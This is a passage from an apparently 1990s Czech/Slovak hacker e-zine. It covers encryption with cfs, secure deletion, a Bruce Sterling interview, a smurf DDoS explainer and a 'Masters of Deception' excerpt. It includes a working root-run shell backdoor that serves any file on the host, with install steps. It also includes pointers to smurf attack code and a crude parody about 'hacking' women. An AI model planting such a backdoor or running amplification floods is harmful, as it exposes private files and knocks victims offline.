americkych vladnich serveru nebo telefony frajerek. urcite by se vam
nelibilo, kdyby se tyhle informace dostaly do rukou nekoho nepovolaneho. jak
to zaridit? jednoduse. neni nic lehciho nez soubory zasifrovat.

existuje
mnoho programu na sifrovani jednotlivych souboru. pro linux napriklad
genialne jednoduchy cryptoman (k dostani v href="http://hysteria.sk/arxiv/">arxivu
, pozor na nekompatibilitu se
starsimi verzemi), ktery pouziva algoritmus DES. ten sice neni uplne
nejbezpecnejsi, dnes jiz totiz neni technicky ani
financne narocne sestrojit masinu dostatecne silnou k jeho prolomeni, ale
v beznych podminkach to bohate staci. sifrovat jednotlive soubory dokaze take pgp, u nej je vyhodou ze je k dispozici jak pro unixy, tak pro
windows. ve windows take muzete pouzit programy jako sharewarovy
Blowfish Advanced 97.


sifrovani jednotlivych fajlu ma take sve
nevyhody. pred kazdym pouzitim je musite dekryptovat, po pouziti zase
zakryptovat - ujde to kdyz skladujete malo informaci v par souborech, ale
jestlize mate desitky ci stovky souboru s privatnimi daty, je lepsi pouzivat
sifrovany cely filesystem.
pro windows je k tomuto ucelu k dispozici
vyborny program BestCrypt. umi na beznem disku vytvorit sifrovany
soubor, ktery lze pripojit jako virtualni disk. muzete si vybrat mezi
algoritmy DES, Blowfish a GOST. nevyhodou je, ze tento program neni zadarmo,
takze pokud ho chcete pouzivat, musite za nej zaplatit nebo ho ukrast... je
skoda, ze diky cele filozofii microsoftu je obtizne nalezt kvalitni program
pod windows zdarma.


to vam vsak nemusi vadit, pokud pouzivate linux. pro ten samozrejme existuje alternativa distribuovana pod licenci
GPL, tedy volne. jmenuje se cfs, coz je zkratka od Crypted
FileSystem, cesky sifrovany souborovy system. da se najit na
vetsine beznych mirroru linuxu, k dispozici by take mel byt v crypto sekci naseho href="http://hysteria.sk/arxiv/">arxivu. program umoznuje uzivateli zalozit
sifrovany adresar, ktery je po
"namountovani" transparentne desifrovan. k zasifrovani muzete pouzit
tradicni a casem proverene algoritmy single nebo triple DES, pokud jste drsni muzi
do nepohody, muzete vyzkouset nove MacGuffin nebo SAFER-SK128.



instalacni program vam nainstaluje binarky cfsd, cmkdir, cattach a cdetach. je take treba mit
zprovozneny rpc.mountd a rpc.nfsd. do startovacich skriptu pridejte start cfsd
demona a pripojeni specialniho adresare. sledujte vypis:


bart# cat /etc/rc.d/init.d/cfsd
echo "Starting cfsd"
cfsd
mount -o port=3049,intr localhost:/.cfsfs /crypt
bart#

do adresare /etc/exports pridejte export /.cfsfs pro localhost, pokud to
rpmko neudelalo za vas:

bart# cat /etc/exports
/.cfsfs localhost # Used for cfs

a cele to nastartujeme:

bart# killall -HUP rpc.mountd rpc.nfsd
bart# /etc/rc.d/init.d/cfsd
Starting cfsd
cfs ready [374]
bart#

sifrovany adresar prikazem vytvorite prikazem cmkdir [adresar]:

bart$ ls
bart$ cmkdir sifrovany_adresar1
Key: necocojentaknekdoneuhodne
Again: necocojentaknekdoneuhodne
bart$ ls
sifrovany_adresar/
bart$

adresar pripojite prikazem cattach [adresar] [jmeno]:

bart$ cattach sifrovany_adresar1 nasa_passwds
Key: necocojentaknekdoneuhodne
bart$ ls /crypt
nasa_passwds
bart$

vytvoril se virtualni adresar /crypt/nasa_passwds, ve kterem muzete vytvaret soubory a podadresare, editovat, mazat a podobne.
za zminku stoji parametr -i N, ktery zpusobi, ze po N minutach neaktivity se
disk sam odpoji.



pokud za oknem slanuje nejaky divny pan, nad domem krouzi vrtulnik a na
dvere nekdo klepe, snazte se stihnout napsat prikaz cdetach nasa_passwds, coz kryptovany adresar odpoji
a znemozni jeho cteni komukoliv nepovolanemu:


bart$ ls /crypt
nasa_passwds
bart$ cdetach nasa_passwds
bart$ ls /crypt
bart$ # prazdno
bart$ ls sifrovany_adresar1
84aaaa2087ed2833 9df742f3d8ac73bd
bart$

vsechna data jsou nyni sifrovana a kapitan Iglo si ani neskrtne.



tolik k pouziti sifrovacich systemu. ted se podivame jeste na jeden problem,
ktery vam muze zneprijemnit zivot na hezkych par let. jsou to smazane
soubory. smazete-li soubor, zrusi se jen odkaz na nej, ale data samotna na
disku zustanou. jdou potom obnovit treba Norton Disk Doctorem - programem za
par korun. ovsem i kdyz je prepisete, nejste uplne v bezpeci. specialni
technikou zvanou magnetic force microscopy lze precist data i nekolikrat
prepsana. pokud tedy chcete opravdu bezpecne smazat nejaky soubor, musite k
tomu pouzite specialni programy, ktere oblast ve ktere byla ulozena data
mnohonasobne prepisou.
pro windows je k dispozici tzv. wiping utility,
ktera je soucasti BestCrypt nebo Blowfish Advanced 97. s cfs se nic takoveho nedodava a musite si to obstarat sami. podivejte
se do arxivu po programu secure-delete. po instalaci tohoto balicku
muzete pouzivat programy srm na bezpecne smazani souboru,
sfill na bezpecne zniceni uz vymazanych dat z "prazdnych" oblasti disku a sswap na
znemozneni cteni z linuxoveho swapu. jako bonus dostanete jeste
patch na zdrojaky programu rm, ktery se po prekompilovani bude znat k volbe
-s jakoze secure.



newroot, newroot(at)hysteria.sk


navrat na obsah



webserver na 20 radku



Zde je kuriozni backdoor, webserver na 20 radku kodu:


#!/bin/sh
read line
case $line in
GET*)
argument=`echo $line | awk '{print $2}' | awk -F "r" '{print $1}'`
if [ -d $argument ]; then
echo -e -n "HTTP/0.001 200 OKnContent-type: text/htmlnn"
[ `ls -l $argument | wc -l` -le 2 ] && echo "empty vole" && exit
for brb in $argument/{.*,*}; do
brb=`echo $brb | sed 's//////'`
echo "<a href="$brb">$brb</a><br>"
done
else
echo -e -n "HTTP/0.001 200 OKnContent-type: text/plainnn"; cat $argument
fi
;;
*)
echo -e -n "HTTP/0.001 500 ErrornContent-type: text/plainnnprotokol mismas volen"
;;
esac


Hodte do /usr/sbin, do /etc/inetd.conf pridejte radku "PORT: stream tcp nowait root /usr/sbin/tcpd
minimalweb", kde PORT je cislo portu na kterem chcete aby minimalweb
visel, a restartujte inetd. V Netscape zadejte URL http://localhost:PORT/ a mate super
fileserver.

(Nefunguje? Hint: /etc/hosts.allow)



newroot, newroot(at)hysteria.sk


navrat na obsah




ako preniknut do systemu zena...

...alebo zakladne informacie o biologickom hackovani



 +[ 0 ]+-----------------------+[ UVOD ]+-------------------------------- 


Tato prirucka mladeho zaletnika vznika v pondelok niekedy doobeda
den potom co sa muf vratil s hysteria session, kde tieto techniky
konzultoval s naslovovzatymi odbornikmi na vysokej komunikacnej urovni
a vo vysoko kulturnom prostredi...


Autori nerucia za pripadne moralne, fyzicke, materialne, psychicke,
hardverove, softferove, geneticke ani ziadne ine skody, negativne,
pozitivne, neutronove, kozmicke, konfrontacne ani ine nasledky sposobene
nespravnym pouzitim nizsie uvedenych informacii...



 +[ 1 ]+-----------------------+[ DISTRIBUCIE, JADRA ]+------------------ 


Medzi zakladne, verejnosti najznamejsie distribucie, mozeme zaradit
nasledujuce:



Blondian - jadra triedy Public - nie prilis bezpecne a stabilne preto
su casto preinstalovavane, takze dlhodobejsie vyuzivanie
systemu neprichadza do uvahy



BrunetWare - jadra typu Romantic - stabilne a jedny z najbezpecnejsich
(ja osobne tiez fachcim na klone BrunetWaru a som velmi
spokojny, pozn. muf, puf prikyvkava hlavou na znak suhlasu)



Red Head - jadra sadistic a pribuzne - tato distribucia je velmi variabilna
a zavisi od administratora na ake pouzitie bude nakonfigurovana,
preto aj bezpecnost je relativna



FreeBLACK - jadra Free - sluzia prevazne ako skolske alebo firemne srvery,
takze ziskat konto nie je problem



 +[ 2 ]+-----------------------+[ ZISKAVANIE INFORMACII O SYSTEME ]+----- 


Pomocou programov typu womaNMAP obet dokladne prescanujeme a snazime
sa zistit distribuciu, triedu jadra (jadro nie je podmienene distribuciou
pozn. muf), a nasledne aj porty na ktorych masina pocuva. Dokladnejsie
by sme sa potom mali pozriet na porty 22, 23, 69, 79, 99, 110. Avsak
najdolezitjesie, co nas zaujima je, ci uz nahodou stroj nie je zdielany
inymi pouzivatelmi!


Nasledovne sa snazime o odchytenie hesiel uzivatelov ( sniff ),
ziskanie ich ID, real name, a prav pre danu masinu. Vhodne je tiez ziskat
informacie o serveri od masin v tej istej sieti, pripadne od ostatnych
strojov v DOMEne...

 +[ 3 ]+-----------------------+[ UTOK ]+-------------------------------- 


Ak uzname ze stroj je pre nas vyhodny a vhodny pre utok, mali by sme
prejst k ofenzive. Postup by mohol vyzerat nasledovne:



- otestujeme vulnerability serveru na bezne exploity, napr. exploity
triedy pozvanie.* (pozvanie.kino, pozvanie.prechadzka, pozvanie.bar)
niekedy a len u niektorych jadier, je mozne ochromit bezpecnost pomocou
c2h5oh utility ( snooping ), ktoru mozeme zamaskovat v nejakom beznom
programe, napr. juice ( tzv. trojan )

pozor ! tieto techniky nie je mozne pouzivat ak je pripojeny ROOT !
S utilitou c2h5oh nie je vhodne si zahravat ak sme neskuseny lameri,
kedze moze lahko sposobit DoS nielen na cielovom stroji ale aj u nas



- snazime sa ziskat poziciu TRUSTED HOST, pripadne naburame iny system,
o ktorom vieme, ze je v .rhosts, pripadne sa inymi technikami sami
snazime dostat do .rhosts



- ako nasledujuci krok by malo nasledovat rusenie .rhostov, obmezovanie
procesov, pamate a nastavenie quoty ostatnym uzivatelom, ako aj co
najviac zaneprazdnit administratorov daneho stroja.



Na skodu nie je ani kontrolovanie posty a monitorovanie komunikacie
a procesov...



- po ziskani accountu na danej masinke je vhodne pre ziskanie UID 0
pouzit multisystemovy a multipaltformovy exploit KWETY, ktory je
uspesny v 90% (skoro ako ten exploit na SUNy v prielome #9 :), pozn.
puf). Aj ked obrana proti tomuto zakernemu utoku je velmi tazka,
odporuca muf pouzivat aspon verziu RUZE 3.0 a vyssie. V pripade
neuspechu sa pokuste utok zopakovat...



- ak nedosiahneme superpouzivatelske prava, mozeme sa pokusit zautocit
aj na sluzbu KISS, ktoru riadi USTAd, a to pomocou kombinacie
standardne implementovanych klientov PERY a JAZYK. Musime vsak byt
opatrni, pretoze v pripade neuspechu je velka pravdepodobnost ze nam
bude vytvoreny nemily, avsak dufajme ze len docasny zaznam v subore
/etc/host.deny, ale moze nastat aj situacia, ze budu pouzite aj prikazy
ako delluser, ci rm -rf v kombinacii s vasim LOGINom, apod.



- niektore drsnejsie povahy preferuju utoky typu BRUTE FORCE, ktore su
vhodne hlavne na jadra triedy sadistic a pribuzne. Cielom je ziskanie
pristupu k sluzbam finger (port 79), suck (port 69) a fuck (port 99).



UPOZORNENIE: Na systemoch s jadrom romantic je tento druh utoku
vyslovene nevhodny a mnohi zabudaju na to, ze ich cinnost
sa loguje a hrozi nielen zmarenie utoku ale aj zamedzenie
pristupu a dokonca priama fyzicka konfrontacia s adminmi,
trusted hostami, ako aj s policiou a inymi organmi...



- na jadra typu romantic je preto najvhodnejsie vyuzit vyssie spomenute
exploity (kino, prechadzka.*, kwety).



- na distribuciu Blondian zabera na 100% exploit na dieru v sprave pameti,
nazyvany medzi hackermi KARELAB/KALERAB. Tento je mozne "tlacit" cez
lubovolny port. Pri tejto distribucii je defaultne povolene pouzivanie
sluzieb FINGER a niekedy aj zmienenych FUCK a SUCK.



 +[ 4 ]+-----------------------+[ FIREWALLY ]+--------------------------- 


V minulosti boli na zamedzovanie sluzby FUCK pouzivane HW ochany, prvi
predchodcovia firewallu, ktore az do zadania patricneho osobneho kluca
blokovali port 99. Nazyvaly sa PASCUDY, co je vlastne skratka zo slov PAS
a CUDNOST. Dnes sa uz tieto primitvne nastroje nevyuzivaju a v pripade,
ze sa najdu nejake podobne zabezpecenia, su tieto tunelovane a obchadzane
prevazne portami 69, 79, pripadne redirektormi cez ine volne porty. Ich
konfiguracia a spojazdnenie v distribucii BrunetWare je dost otiazne a
vyzaduje vela casu a zrucnosti.

 +[ 5 ]+-----------------------+[ ZABARIKADOVANIE ]+--------------------- 


Po dosiahnuti ROOT LEVELU na cielovej masine dochadza casto (hlavne v
distribuciach s jadrami romantic) k zavedeniu zdielania diskov a procesov
a k zosuladeniu userlistov, trusted hostov a k blokacii vacsiny portov
vonkajsiemu svetu. V jadrach romantic je tato podpora priamo zabudovana,
avsak u jadier sadistic, free a public je nutne tuto podporu dokompilovat
ako zvlastny modul. V distribucii Blondian je spojazdnenie, vyuzivanie
a administracia tychto sluzieb priam nemozna. Ak sa to niekomu podarilo,
pripadne ma s tymto problemom blizsie skusenosti, ozvite sa prosim na nasu
znamu adresu: Slovenska Televizia, Mlynska Dolina, 845 45 Bratislava.

 +[ 6 ]+-----------------------+[ LEGISLATIVA ]+------------------------- 


UPOZORNENIE: Treba si davat pozor, pretoze zakon zakazuje vyuzivanie portov
69, 79 a hlavne 99 (sluzby suck, finger a hlavne fuck = sietovy kombinacno
duplifikacny protokol, skratka je z ludoveho narecia autora, ktory bol
domorodcom z ostrova borneo, s mierne ugrofinskym prizvukom, pozn. muf) na
nestabilnych strojoch, tj. strojoch ktorych UPTIME je mensi ako 15 rokov.
Niektore stroje sa preto snazia oklamat potencionalnych zaujemcov o vyuzitie
tychto sluzieb pouzivanim PATCHnuteho uptimu, modifikaciou systemoveho casu,
pripadne vyuzivaju ine maskovacie techniky a lakaju tak userov/attackerov na
vyuzivanie tychto sluzieb.

 +[ 7 ]+-----------------------+[ BACKDOORY A NAVRATY SPAT ]+------------ 


Vo vseobecnosti sa neodporuca skusat opakovane navraty pomocou zadnych
dvierok, avsak tato moznost existuje. Najpouzivanejsim backdoorom je
vytvorenie vlastneho administratorskeho konta a zmenenie rootovskeho hesla.
System je potom na nas plne zavisly. Dalsimi, avsak menej vyuzivanymi
zadnymi dvierkami je odchytenie a zalohovanie privatneho komunikacneho
kluca. Zablokovanie pristupu po odhaleni, je vsak velmi jednoduche, staci
tento kluc zamenit za iny a zostaneme navzdy vyvreti zo systemu.

 +[ 8 ]+-----------------------+[ VSEOBECNE RADY ]+---------------------- 


Ak sa rozhodnete system vyuzivat vo vacsej miere, je vhodne masinu raz
za cas rebootovat. Poma ha to spravne nacitat vasu konfiguraciu. Niekedy
vsak staci len prikaz kill -POHUBE 1. Tieto problemy s implementovanim
spravnej konfiguracie sa vyskytuju hlavne v distribuciach s jadrami
sadistic a najma free a public.

Odporucane su aj upgrady systemu zaveditelnymi modulmi jadra DETi, ci
uz aplikaciou X-Lapec alebo daemonom IEVCAd. Vhodne je instalaciu
konzultovat s povodnymi administratormi systemu.

 +[ 9 ]+-----------------------+[ DOVERYHODNOST A BEZPECNOST ]+---------- 


Tento navod berte s rezervou a hlavne pri sietovom styku pouzivajte
ochranne prostriedky, ci uz HW povodu (tabletky, vyrobky z plastickych hmot,
firmu DUREX odporucaju 8 z 10 zuba...gynekologov) alebo SW (wrappery, ...)
Uvedene techniky nie je vhodne pouzivat na verejnych, nekryptovanych kanaloch,
uliciach alebo inych miestach obvykleho vyskytu, ale doporucujeme vyuzivat
kryptovanu komunikaciu na neverejnom okuhu, odpojenom od ostatnych sieti,
pripadne pracovat priamo za systemovou konzolou...

-----------------------------------------------------------------------------

puf a muf (pufamuf(at)hysteria.sk, after session, volna hodina & skolsky bufet)


navrat na obsah



interview s bruce sterlingom



Bruce Sterling, spisovatel, novinar, editor a kritik sa narodil v roku 1954. Editoval
zbierku Mirrorshades, definitivny dokument kyberpunkoveho hnutia. Pise popularno-vedecku
rubriku pre The Magazine of Fantasy and Science Fiction a literatno-kriticku rubriku pre
Science Fiction Eye.


Jeho posledna kniha, The Hacker Crackdown: Law and Disorder on the Electronic Frontier,
je ne-fikcna praca o pocitacovej kriminalite a elektronickych obcianskych pravach,
publikovana v Bantam Books v roku 1992. Sterling je v dozornej rade Electronic Frontier
Foundation--Austin a pracuje na Vybore pre kontrolu cinnosti policie v tejto miestnej Texaskej
organizacii pre elektronicke obcianske prava.


Vystupoval v televizii ABC v programe "Nightline", v BBC "The Late Show", v CBS "Morningside",
na MTV, v Newsday, Omni, Whole Earth Review, Details, Computerworld, The New York Times, Der
Spiegel, Mondo 2000, Wired, a ine rovnako nepravdepodobne veci. Zije v Austine s jeho
manzelkou a dcerou.


The Agitprop Disk, zbierka prac ktoru Sterling spristupnil net komunite, je pristupna cez
gopher server na tic.com. Vela informacii je tiez pristupnych v jeho archive na
Well gopher serveri.


Nasledujuce interview je z pera Pavla Vojira pre pripravovane CzERT CDecko. Preklad z angliny
pajka.



From v(at)jir.cz Wed Dec 9 14:17:15 1998
From: Pavel Vojir
To: "Bruce Sterling"
Subject: questions from Czech Republic
Date: Wed, 9 Dec 1998 21:39:24 +0100

Posielam Vam prvu cast otazok. Pretoze som novinar, zvycajne sa najprv ludi pytam
a potom dam reakcie na ich odpovede. To je dovod preco je toto prva cast.
Vdaka, v(at)jir
eeehmmm... sorry za moju zlu anglictinu.

1. Aj ked ste autorom sci-fi (a spolu-autorom), Vase meno je zname vo svete
ne-fikcnymi knizkami, pisanim pravdivych pribehov. Nebolo to pre Vas tak trochu
sklamanie ?

*Vacsina ludi po svete ma pozna skor ako spisovatela science fiction, nez
ako novinara. Ale mne je to jedno tak ci tak. Mam univerzitne vzdelanie ako
novinar. Beriem moju novinarsku pracu seriozne.


2. Kedy ste poculi prvy krat slovo "hacker"?

Pravdepodobne niekedy zaciatkom 70-tych rokov.


3. Vasa kniha The Hacker Crackdown (THC) nie je priatelska voci hackerom
a nie je priatelska ani voci policajtom. Mali ste niekedy problemy s niektorou
z tychto skupin v suvislosti s Vasou knihou ?

Policajti su vacsinou vcelku slusni. Policajti ktori nedokazu ovladat svoje
pocity nedokazu taku robotu dlho robit. Obcas mavam take sibalske telefonaty
od hackerov a telefonnych phreakerov. To mi velmi nevadi, ono ma to vobec
nestve. Dostavam dost emailov od hackerov z celeho sveta. Vacsina z nich je
velmi priatelskych.


4. Kolko hackerov sa snazilo ukazat Vam ich "umenie" ?

Hackeri sa vzdy chvalia svojimi exploitami. Musia sa chvalit, pretoze
keby ste ich sledovali pri tych ich neplechach, je to v skutocnosti dost
hlupe. Mlady chalan s okuliarmi sedi a pise : ako vzrusujuce to moze byt ?


5. Knihu THC ste napisali na zaciatku informacneho veku, na zaciatku
masivnej explozie Internetu - stale sa zaujimate o dnesnu pracu hackerov
a co si myslite o velkom vplyve Internetu ?

*Ano, zaujimam sa dost o media a o dopad medialnych technologii na strukturu
spolocnosti. Vlastne sa velmi nezaujimam o hackerov. Velmi sa zaujimam
o pocitacovych milionarov, pocitacovych spionov, pocitacovu armadu, pocitacovu
policiu. To su pocitacove skupiny, ktore maju skutocnu moc a vplyv na nasu
spolocnost. Hackeri su vacsinou mladi chalani ktori sa citia bez moci a
hladaju nejaky sposob ako by dokazali ze ziju a ze by sme si ich mali vsimat.


6. Poculi ste niekedy o ceskej skupine hackerov, ktora sa vola CzERT ?

Obcas o Czerte pocujem. Skor sa zaujimam o ceske zalezitosti. Napisal som
raz clanok pre WIRED o zivote v Prahe, ktory sa volal "Triumph of the
Plastic People." Mam rad Cechov. Napriklad Cesi si to spravili omnoho lepsie
ako nestastni Slovaci. Ked sledujem udalosti vo Vasej casti sveta, zaujimam
sa ovela viac o Meciarovu tajnu policiu ako o Czert. Meciarovi spioni
schmatli prezidentovho syna, zbili ho, davali mu elektricke soky, naliali
do neho whiskey a vyhodili v Rakusku. To je povsimnutelna vec. Czert,
na druhej strane, je kopa technickych deciek ktore sedia pred obrazovkami
a hybu prstami hore a dole.

**) Nie su TVRDI hackeri - navstivili kopu ceskych internetovskych serverov,
napr. Ministerstvo Obrany, Ministerstvo Zdravotnictva, jednu domacu stranku
velkej banky - ale nikdy neukradli alebo neznicili ziadne data - iba spravili
nejake zartiky a ukazali: Na tomto serveri nie je ziadna bezpecnost !

*Toto je mierne otravna, ale v podstate neskodna aktivita. Nikomu to nepomoze
prelomit bezpecnost webovskej stranky. Uvedomme si: cela Vasa *krajina*
nie je bezpecna. Hlavne velmoci na Vasom kontinente mozu prebehnut tankami po
celom Cesku kedykolvek si zmyslia. Naozaj chcete mat viac "bezpecnosti" ?
Ceske atomove bomby, Ceske interkontinentalne rakety, obrovsku Cesku armadu,
Ceske atomove ponorky ? Niektore druhy "bezpecnosti" proste za to nestoja.
Citite sa lepsie teraz, ked som Vam povedal aku "nizku bezpecnost" mate ?

*Co sa tyka Czertu, ich domace stranky a domace pocitace mozu byt "bezpecne,"
ale ich *zivoty* nie su bezpecne. Ak hackeri naozaj nastvu policiu, mozu
byt kedykolvek zatknuti a potom na seba navzajom poinformuju policiu, tak ako to
hackeri robia. Je to velmi riskantny sposob zivota. Hackeri naozaj nie su v
pozicii aby davali lekciu inym ludom o "bezpecnosti". Su mladi a lahkomyselni.



navrat na obsah



smurf attack



"Smurf" utok, nazvany podla exploitu, je jednym z momentalne
najpouzivanejsim v kategorii siet proti hostovi. Utocnik vy-
tvori velke mnozstvo ICMP echo (ping) trafficu na pocitacoch
s verejnymi IP adresami, vsetky so spoofovanou zdrojovou
adresou obete. Pokial routovacie zariadenie doruci tento
traffic verejnym adresam, vela hostov na tejto verejnej sieti
prebere ICMP echo request a kazda z tychto adries mu odpovie.
Tymto sa vynasobi traffic cislom adries, ktore odpovedaju.


"Smurf" utok ma pribuzneho, ktory ma meno "fraggle". Ucel je
v podstate rovnaky, len fraggle nepouziva ICMP, ale UDP. Bol
to vlastne len jednoduchy prepis zdrojoveho kodu smurfu.


Tieto dva utoky su uz nieco okolo jedneho roku stare. Teraz
ale prisiel tzv. "Papasmurf". Papasmurf zvlada ICMP aj UDP,
moze pouzivat len ICMP alebo UDP, alebo obidve naraz. Aby sa
dalo smurfovanie pouzivat, treba mat najprv nieco ako zoznam
tzv. "Broadcast" adries. Broadcast adresy su adresy pocitacov,
kde nemaju patchnute nastavenie siete a umoznuju vam vyuziva-
nie verejneho smurfovania. Taketo zoznamy sa daju ziskat na
netscan sluzbach. Na rootshelli je k dispozicii zdrojak smurfu,
fraggle a papasmurfu. Je tam aj odkaz na sajtu, kde najdete
scan broadcast sieti, ktore budete potrebovat pri smurfovani.


Uvedme si to na priklade (dost prehnanam).
Povedzme si ze mame 100 broadcast adries a ze mame T1 linku.
Povedzme ze posleme ICMP echo (ping) packety prudom 768kb/s
so spoofovanou adresou obete tymto 100 adresam. Kazda prebere
packety a kedze je zdrojova adresa spoofovana, tak odpovedie
na nu. Cize jednoduchym vypoctom dojdeme na to, ze tychto na-
sich 768kb/s x 100(hostov) = 76,8Mbps trafficu, ktory smeruje
na obet. Dost dobre sa to da vyuzit pri spomalovani, popripade
uplnom odpojeni obete. Tento utok sa najcastejsie pouziva na
IRC a ludoch pripojenych na tom (napriklad takeover). Ludia,
co pouzivaju na pripojenie od inetu modemovy dial-up su v pod-
state hned vyradeni, staci ich iba priebezne pingnut na IRC,
nech odtial vypadnu [ping timeout :))].


Pocitace ktore mame v broadcast adress liste sa tiez nazyvaju
"amplifiers" (zosilnovace utoku). A teraz nieco pre adminov.


Paul Ferguson z Cisco systems a Daniel Senie z BlazeNet k tomu-
to napisali RFC. Pre viac informacii a prikladov sa pozrite na
adresu:
ftp://ftp.isi.edu/in-notes/rfc2267.txt


Adminom sieti doporucujem nastudovat o tomto informacie, aby
ich pocitacie v sieti nemohli byt napadnute, popripade vyuzivane
na zosilnovanie utokov. Scan siete ci moze byt vas pocitac pouzi-
ty na zosilnovanie utoku vam umozni netscan: www.netscan.org


Cast textu bola prevzata a prelozena z dokumentacie popisujucej
smurfovanie, ktoru napisal Craig A. Huegen.



d4Rkl0Rd


navrat na obsah



valka elektronickych gangu II.




toto je slubene pokracovanie prekladu uryvku z knihy michelle slatallovej a
joshua quittnera (quit@newsday.com) s nazvom "masters of deception: the gang that ruled
the cyberspace" (harper-collins, 1995).

preklad pajka


V kazdom dobrom pribehu nadide cas, kedy sa dej neocakavane zvrtne.
Zivot sa hybe dalej, tvoriac si svoju vlastnu rutinu a rytmus, ked zrazu
nieco alebo niekto zasiahne, a vsetko sa zrazu zrychli. A pribeh sa uda
novym smerom.


Jedneho dna, na jesen 1989, behal Eli po znamom teritoriu na sieti a rozhodol
sa mrknut sa na reporty o niekolkych znamych hackeroch z Brooklynu.


Ten Brooklynsky hacker sa vola Corrupt. Povrava sa o nom ze je to specialista.
MOD-u by sa vzdy zisiel nejaky specialista a Corrupt udajne vie o neznamych
a silnych podnikovych VAX serveroch viac ako zakladatel Digital Equipment
Corporation. Co by bolo vcelku dost, kedze Digital tieto zabite masiny
vyraba.


Expert ktory rozumie problematike administrovania VAX pocitacov by mohol
rozsirit zakladnu MOD. Takyto frajer do VAXov by mohol pomoct ostatnym
chalanom z MOD navigovat sa cez pocitace, ktore sa doteraz zdali byt
prilis bizarne. Nielenze je VAX prave ten typ pocitaca ktory ocenuju hackeri,
ktory zboznuju silu a versatilitu tohoto stroja, ale VAXy su tiez klucovym
bodom informacnych systemov univerzit, akcioviek, malych podnikov,
databazovych archivov a kniznic po celej krajine. No a samozrejme aj
vlada ich ma plnu pazu. Vlada drzi kopu svojich tajomstiev schovanych na
VAXoch.


A Corrupt ich dokaze hacknut. Pridajte ho k skupine !


Je toho vela co Eli nevie o Corruptovi. Nevie napriklad ze byva so svojou
mamou v bejvaku na tretom poschodi pavlacoveho domu v Bedford-Stuyvesant
(to je Bed-Stuy, urcite ste o tom poculi, tak ako ste iste poculi o
Cabrini Green a Vychodnom LA), jednom z najhorsich casti New Yorku. Eli
nevie ze Corrupt nebude musiet byt zoznamovany s konceptom MOD, pretoze
Corrupt je zvyknuty na clenstvo v gangu ktory sa vola Deceptions. Jedna
vec ktoru Eli rychlo zisti: skutocne meno Corrupta je John Lee.


John Lee vytoci "0".


Teraz je zaciatok roka 1999, a John Lee je v MOD. Tento hacker sa opiera
o skupinku telefonnych automatov a atriu vysokej Cicicorp budovy v centralnom
Manhattane. Citi sa cool ked sa mrkne do svojho odrazu vo vyklade talianskej
restauracie pri rohu otvoreneho priestoru.


Okolo neho, chalani sa hraju s telefonmi ako vrabce pri krmelci, vytacaju
a vesaju, skusaju randomne telefonne cisla. Povaluje sa tam okolo 50
teenagerov, vymienaju si informacie o tom ako sa da naburat do pocitacovych
systemov, formuju energeticke clustery. Chalani vytacaju cislo o ktorom
ktosi tvrdi ze pripoji na New Yorsky switch. Cislo este minuly tyzden
fungovalo. Hackeri sa zgrupovali okolo siestej hodiny, kratko na to ako
kancelarski uradnici z Citicorp budovy zmizli v metre. Chalani sem chodia
raz za par tyzdnov, kazdy prvy piatok v mesiaci. Nezaleziac na pocasi,
nosia obnosene bundy, siroke rifle, topanky s hrubymi podrazkami, hrube-hrube
cierne opasky so stvorcovymi kovovymi prackami vaziacimi do dvoch kil.
Nemozete si ich nevsimnut. Ich stretnutie je ich "meeting".


Prichod Johna Leeho do MOD je prirodzeny, pretoze ma silny zaujem o
pocitacove dobrodruzstva; vsetko co xce robit je naburavat sa do novyh
systemov. Za ten rok co si zohnal modem sa naucil tolko o hackovani a
crackovani ze f pohode dohnal ostatnych v MOD tlupe. Spravi cokolvek
aby sa dotal do noveho pocitaca. Prenikne do siete, potom odovzda informacie
ostatnym MOD clenom. On je skaut; oni obsadzuju teritorium.


Z telefonnej budky sa John pripoji na operatora. "Hej, som tunak na stoziari
telefonneho vedenia," hovori, a pouziva pri tom svoj najhrubsi,
najautoritativnejsi dospelacky hlas. Keby tak mohla operatorka vidiet Johna,
vysokeho, 20-rocneho cernosskeho mladika s dreadlockmi, bielym trikom a
khaki nohaviciach takych sirokych, ze by sa tam strcil este dalsi kamos.
Nevyzera absolutne na toho na koho sa hra - bieleho technika telefonnej
spolocnosti v strednom veku na servisnom zasahu telekomunikacnej stanice.
Ale znie tak.


A to mozno staci. Mozno sa operator necha presvedcit jeho hladkym techno-zargonom
a da mu otvorenu linku.


"Ano, potrebujem - sakra"


Odpojene.


John zavesi.


Medzitym dole v Texase su chalani z Legoin of Doom sucastou sialeneho
uhanania nadsenych hackerov, ktory vsetci naskocia naraz na jednu telefonnu
linku, plniac konverzaciu ako metro v dobe dopravnej spicky. Chris
(aka Erik Bloodaxe) a priatel pod menom Scott Chasin su kamosi od polky
80-tych rokov, ked boli obaja nahodou prihlaseni na Stredozapadnu undergroundovu
BBS-ku s nazvom World of Kryton. Scott a Chris zistili ze maju toho kopu
spolocneho: obidvaja boli narodeni zaciatkom 70tych rokov a vyrastali v
bezpecnom prostredi ktore si dovolila biela stredna vrstva v Texase.
Mali podobne hobby: obidvaja robili konferencne mosty, ako to nazyvali.


Telefonna linka pouzivana skupinou Legion Of Doom patri - nuz, povedzme
len ze bola docasne oslobodena od miestnej telefonnej spolocnosti,
umoznujuc anarchickym hackerom viest obrovske transkontinentalne konferencne
hovory ktore vytvarali mosty cez mesto, krizom cez stat, ako sa jeden chalan
za druhym pripoja na tuto linku. Ak si na linke a mas troj-smerne volanie
na svojom telefone, stlacis flash a odpojis hovor, potom zavolas kamosovi a
stlacis znovu flash. Teraz mas troj-smerny hovor. A keby mal ten kamos tiez
troj-smerny hovor, moze zavolat do konferencie dalsieho ucastnika.


Tieto komunikacne retaze trvaju hodiny, dni, maratonske mnozstvo casu, ktory
si dospelaci ani nemozu predstavit. Je toho tolko co si maju povedat. Mosty
su vyborny sposob ako sa spoznat. Po takomto moste sa mozes vydat na cestu
po svete, hovorit s jednym hackerom v Holandsku a sucasne konverzovat s niekym
v New York City. Vlastne prave z New York city je skupinka mysterioznych
novacikov ktori sa volaju Corrupt a Outlaw a obcas sa pri konferenciach
vcelku pustia do Texaskych chalanov. Chris a Scott sa nikdy v reale nestretli
s tymito chalanmi z New Yorku, ale poculi o nich. Iba povrchne. Poculi ze
Corrupt a Outlaw su z miesta ktore oni pokladaju za "mestske ghetto",
ale New Yorski chalani sa zda vcelku vyznaju vo veci.


Jednej noci v roku 1990, na moste, okolo pat alebo sest hackerov - vsetko
chalani z Texasu - kecaju spolu na jednej linke. O com sa rozpravaju ?
Randomne veci. Chris nie je pripojeny, tak to aspon neskor tvrdi. Scott
